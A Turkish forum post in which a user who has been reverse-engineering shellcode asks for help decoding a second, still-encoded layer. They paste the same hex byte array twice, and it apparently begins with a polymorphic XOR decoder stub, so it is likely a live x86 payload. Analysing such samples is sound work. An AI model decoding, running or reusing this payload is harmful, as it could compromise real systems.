- Katılım
- 30 Haz 2017
- Tepki puanı
- 7
Rating - 0%
Dün gece shellcode reverse engineer ettim ve payload kısmı base64 ile şifrelenmişti onu decode ettim ve decode ettikten sonra başka bir kısım çıktı ve onu decode edemedim yardım ederseniz çok sevinirim kod burda byte array yada opcode ile şifrelenmiş galiba tam bilemedim sizde yardımcı olurmusunuz anlamadım FİKRİNİZ VARSA BİLE SÖYLEYİN
KOD :
0xbd\0x7d\0x92\0xc2\0x70\0xd9\0xe9\0xd9\0x74\0x24\0xf4\0x5e\0x33\0xc9\0xb1\0x47\0x31\0x6e\0x13\0x03\0x6e\0x13\0x83\0xee\0x81\0x70\0x37\0x8c\0x91\0xf7\0xb8\0x6d\0x61\0x98\0x31\0x88\0x50\0x98\0x26\0xd8\0xc2\0x28\0x2c\0x8c\0xee\0xc3\0x60\0x25\0x65\0xa1\0xac\0x4a\0xce\0x0c\0x8b\0x65\0xcf\0x3d\0xef\0xe4\0x53\0x3c\0x3c\0xc7\0x6a\0x8f\0x31\0x06\0xab\0xf2\0xb8\0x5a\0x64\0x78\0x6e\0x4b\0x01\0x34\0xb3\0xe0\0x59\0xd8\0xb3\0x15\0x29\0xdb\0x92\0x8b\0x22\0x82\0x34\0x2d\0xe7\0xbe\0x7c\0x35\0xe4\0xfb\0x37\0xce\0xde\0x70\0xc6\0x06\0x2f\0x78\0x65\0x67\0x80\0x8b\0x77\0xaf\0x26\0x74\0x02\0xd9\0x55\0x09\0x15\0x1e\0x24\0xd5\0x90\0x85\0x8e\0x9e\0x03\0x62\0x2f\0x72\0xd5\0xe1\0x23\0x3f\0x91\0xae\0x27\0xbe\0x76\0xc5\0x53\0x4b\0x79\0x0a\0xd2\0x0f\0x5e\0x8e\0xbf\0xd4\0xff\0x97\0x65\0xba\0x00\0xc7\0xc6\0x63\0xa5\0x83\0xea\0x70\0xd4\0xc9\0x62\0xb4\0xd5\0xf1\0x72\0xd2\0x6e\0x81\0x40\0x7d\0xc5\0x0d\0xe8\0xf6\0xc3\0xca\0x0f\0x2d\0xb3\0x45\0xee\0xce\0xc4\0x4c\0x34\0x9a\0x94\0xe6\0x9d\0xa3\0x7e\0xf7\0x22\0x76\0xea\0xfd\0xb4\0x26\0xee\0xbb\0x0b\0xb1\0xf2\0xbb\0x92\0xfa\0x7a\0x5d\0xc4\0xac\0x2c\0xf2\0xa4\0x1c\0x8d\0xa2\0x4c\0x77\0x02\0x9c\0x6c\0x78\0xc8\0xb5\0x06\0x97\0xa5\0xee\0xbe\0x0e\0xec\0x65\0x5f\0xce\0x3a\0x00\0x5f\0x44\0xc9\0xf4\0x11\0xad\0xa4\0xe6\0xc5\0x5d\0xf3\0x55\0x43\0x61\0x29\0xf3\0x6b\0xf7\0xd6\0x52\0x3c\0x6f\0xd5\0x83\0x0a\0x30\0x26\0xe6\0x01\0xf9\0xb2\0x49\0x7d\0x06\0x53\0x4a\0x7d\0x50\0x39\0x4a\0x15\0x04\0x19\0x19\0x00\0x4b\0xb4\0x0d\0x99\0xde\0x37\0x64\0x4e\0x48\0x50\0x8a\0xa9\0xbe\0xff\0x75\0x9c\0x3e\0xc3\0xa3\0xd8\0x34\0x2d\0x70
KOD :
0xbd\0x7d\0x92\0xc2\0x70\0xd9\0xe9\0xd9\0x74\0x24\0xf4\0x5e\0x33\0xc9\0xb1\0x47\0x31\0x6e\0x13\0x03\0x6e\0x13\0x83\0xee\0x81\0x70\0x37\0x8c\0x91\0xf7\0xb8\0x6d\0x61\0x98\0x31\0x88\0x50\0x98\0x26\0xd8\0xc2\0x28\0x2c\0x8c\0xee\0xc3\0x60\0x25\0x65\0xa1\0xac\0x4a\0xce\0x0c\0x8b\0x65\0xcf\0x3d\0xef\0xe4\0x53\0x3c\0x3c\0xc7\0x6a\0x8f\0x31\0x06\0xab\0xf2\0xb8\0x5a\0x64\0x78\0x6e\0x4b\0x01\0x34\0xb3\0xe0\0x59\0xd8\0xb3\0x15\0x29\0xdb\0x92\0x8b\0x22\0x82\0x34\0x2d\0xe7\0xbe\0x7c\0x35\0xe4\0xfb\0x37\0xce\0xde\0x70\0xc6\0x06\0x2f\0x78\0x65\0x67\0x80\0x8b\0x77\0xaf\0x26\0x74\0x02\0xd9\0x55\0x09\0x15\0x1e\0x24\0xd5\0x90\0x85\0x8e\0x9e\0x03\0x62\0x2f\0x72\0xd5\0xe1\0x23\0x3f\0x91\0xae\0x27\0xbe\0x76\0xc5\0x53\0x4b\0x79\0x0a\0xd2\0x0f\0x5e\0x8e\0xbf\0xd4\0xff\0x97\0x65\0xba\0x00\0xc7\0xc6\0x63\0xa5\0x83\0xea\0x70\0xd4\0xc9\0x62\0xb4\0xd5\0xf1\0x72\0xd2\0x6e\0x81\0x40\0x7d\0xc5\0x0d\0xe8\0xf6\0xc3\0xca\0x0f\0x2d\0xb3\0x45\0xee\0xce\0xc4\0x4c\0x34\0x9a\0x94\0xe6\0x9d\0xa3\0x7e\0xf7\0x22\0x76\0xea\0xfd\0xb4\0x26\0xee\0xbb\0x0b\0xb1\0xf2\0xbb\0x92\0xfa\0x7a\0x5d\0xc4\0xac\0x2c\0xf2\0xa4\0x1c\0x8d\0xa2\0x4c\0x77\0x02\0x9c\0x6c\0x78\0xc8\0xb5\0x06\0x97\0xa5\0xee\0xbe\0x0e\0xec\0x65\0x5f\0xce\0x3a\0x00\0x5f\0x44\0xc9\0xf4\0x11\0xad\0xa4\0xe6\0xc5\0x5d\0xf3\0x55\0x43\0x61\0x29\0xf3\0x6b\0xf7\0xd6\0x52\0x3c\0x6f\0xd5\0x83\0x0a\0x30\0x26\0xe6\0x01\0xf9\0xb2\0x49\0x7d\0x06\0x53\0x4a\0x7d\0x50\0x39\0x4a\0x15\0x04\0x19\0x19\0x00\0x4b\0xb4\0x0d\0x99\0xde\0x37\0x64\0x4e\0x48\0x50\0x8a\0xa9\0xbe\0xff\0x75\0x9c\0x3e\0xc3\0xa3\0xd8\0x34\0x2d\0x70
